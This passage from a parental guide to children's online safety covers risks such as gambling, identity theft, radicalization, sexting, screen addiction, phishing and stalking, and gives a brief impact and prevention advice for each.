● Children may unintentionally encounter inappropriate content, such as explicit sexual material, violence, or disturbing images, through search engines, social media, or video platforms.
●​ Impact: Psychological harm, confusion, and exposure to harmful ideas or
behaviors.
●​ Prevention: Use parental controls and safe search filters, restrict access to
certain websites, and talk openly about the potential dangers of certain content.

4. Online Gambling and Gaming Risks

● Children may be exposed to online gambling through gaming apps, advertisements, or social media. Additionally, some online games have mechanisms that encourage players to spend money.
●​ Impact: Addiction, financial loss, and exposure to gambling-related behaviors.
●​ Prevention: Use parental controls to restrict access to gambling sites or apps,
and educate children about the risks of online gaming and in-app purchases.

5. Identity Theft and Scams

● Children can become victims of identity theft if they share personal information, such as their name, address, or social security number, with malicious individuals or through insecure websites.
●​ Impact: Fraudulent activity, long-term damage to credit, and exposure to
scams.
●​ Prevention: Teach children not to share personal information online, ensure the
use of secure websites, and monitor financial accounts.
6. Online Radicalization

● Extremist groups or individuals may target children and adolescents online to promote harmful ideologies, recruit for violence, or manipulate vulnerable minds.
●​ Impact: Emotional distress, radicalized behavior, and the potential for
dangerous real-world actions.
●​ Prevention: Monitor social media usage, educate children on recognizing
extremist content, and encourage open dialogue about online experiences.

7. Sexting and Sharing Explicit Images

● Sexting refers to the exchange of sexually explicit images or messages. Children and teens may be pressured into sending inappropriate content or become victims of image-based abuse.
●​ Impact: Emotional harm, cyberbullying, blackmail, and potential legal
consequences.
●​ Prevention: Educate children about the risks of sexting, establish boundaries
for sharing personal content, and promote healthy online communication.

8. Addiction to Screen Time

● Excessive screen time can lead to addiction to social media, gaming, or streaming services, which can affect physical health, sleep patterns, and social skills.
●​ Impact: Health issues such as eye strain, sleep deprivation, lack of physical
activity, and weakened social relationships.
●​ Prevention: Set time limits on screen use, encourage outdoor activities, and
balance digital engagement with face-to-face interactions.

9. Phishing and Fraud

● Cybercriminals may use phishing schemes to trick children into sharing personal information, such as login credentials or payment information, by impersonating legitimate entities.
●​ Impact: Financial loss, privacy violations, and exposure to fraudulent activities.
●​ Prevention: Teach children how to recognize phishing attempts, monitor online
transactions, and use strong, unique passwords.

10. Unwanted Communication and Stalking

● Children may receive unsolicited messages or friend requests from strangers or stalkers who seek to exploit or harm them.
●​ Impact: Emotional distress, feelings of being unsafe, and potential threats to
physical safety.
●​ Prevention: Teach children to reject unsolicited communication and report
suspicious messages to trusted adults or authorities.
